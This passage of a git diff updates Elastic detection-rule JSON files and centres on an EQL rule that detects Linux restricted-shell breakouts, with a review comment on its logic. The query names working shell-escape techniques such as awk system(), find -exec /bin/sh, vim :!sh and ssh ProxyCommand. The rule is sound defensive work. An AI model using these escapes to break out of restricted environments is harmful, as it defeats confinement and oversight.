execution via the maliciously spawned shell,\n - Search the environment for additional 
compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", 
\"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == 
\"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json index 986f9b855d3..85b6a24e5b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json 
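Review bot: In the `git` branch of the new-side `query` value, `not process.name == "ssh"` can never be false, because the enclosing clause now restricts `process.name` to the literal shell names `("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")`; the `ssh` exclusion only made sense with the `process.name : "*sh"` wildcard used in the older rule versions in this same diff, so it is now dead. Assuming the usual EQL precedence where `and` binds tighter than `or`, that clause also reads as `(parent is git and parent.args match) or (process.args match and not ssh)`, meaning the second half fires for any listed shell whose own arguments contain `*PAGER*`, `!*sh` or `exec *sh` regardless of parent; if the git parent constraint was meant to cover both halves, the fix is to group the alternatives: `(process.parent.name == "git" and (process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or process.args : ("*PAGER*", "!*sh", "exec *sh")))`. This is pre-existing rule logic rather than something the hunk changes (it only re-encodes `\u0026`, `\u003c` and `\u003e` as literal characters), so it probably belongs in the upstream detection-rules source rather than in these generated package files. The `note` value in the same hunk also carries many spelling errors in analyst-facing guidance (`suspricous`, `imment`, `behviour`, `MITTRE`, `releaved`, `netwrok`, `crednetials`, `Investiagte`) that would be worth correcting at the same source.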
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", 
\"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in 
(\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional 
compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", 
\"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == 
\"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json b/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json index e21e8461e76..3fd17b1abc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json index 23f93adc940..5146d72daa7 100644 
--- a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json index 51b9b8409af..26cb24ab14d 100644 --- a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json index 842844f726d..83ed952ed7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
@@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json index 9c5cb822114..f6c825f7afd 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json index 403db9ab7b5..35a2e35e983 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json index 81849bc1271..55c1d298e70 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_104.json 
@@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json index f8ba3f4aafe..c47fd054ec1 100644 --- a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json index 43456c728fd..2be1ec1b424 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json index 2aeb3b8e5d3..8fa92a8e8ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_2.json 
@@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json index a28a4046862..e8309bb3c3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json index 4e1c1c1ba24..4d52ce2c93d 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_4.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json index 67780998a1e..308dd840ef0 100644 --- a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_5.json 
@@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json index 4c02ec5505d..f5f7202e6df 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json index 13096e29e8f..1522ffab974 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json index 7c6a4d4ad7a..7ff996a4bbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_104.json 
@@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json index db4c5d12b3b..47ffb768d5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json index 54864a11d7f..26234433276 100644 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json index a65df01f08c..dd7f930d843 100644 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_102.json 
